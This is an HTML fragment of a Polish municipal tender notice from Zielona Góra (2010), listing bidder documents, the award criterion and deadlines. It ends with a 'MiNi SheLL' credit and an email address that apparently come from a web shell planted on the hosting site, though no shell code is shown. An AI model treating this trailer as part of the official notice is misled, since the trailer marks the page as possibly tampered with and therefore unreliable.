<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty i oświadczenia niezbędne do przeprowadzenia postępowania, wymagane od Wykonawcy ubiegającego się o zamówienie:
1)	wypełniony formularz oferty wg załącznika nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika nr 2 do SIWZ; 
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp wg załącznika nr 3 do SIWZ;
4)	dokładnie wypełniona Tabela Elementów Rozliczeniowych wraz z ceną końcową (netto) przedmiotu zamówienia na formularzach wg załącznika Nr 8 do SIWZ;
5)	zaakceptowany projekt umowy wg załącznika Nr 9 do SIWZ; 
6)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zielona-gora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zielona Góra, 65-424 Zielona Góra, ul.Podgórna 22, pok. 408..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 11:00, miejsce: Urząd Miasta Zielona Góra, 65-424 Zielona Góra, ul.Podgórna 22, pok. 408..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie dotyczy projektu, programu finansowanego ze środków Unii Europejskiej.
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej w ofercie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com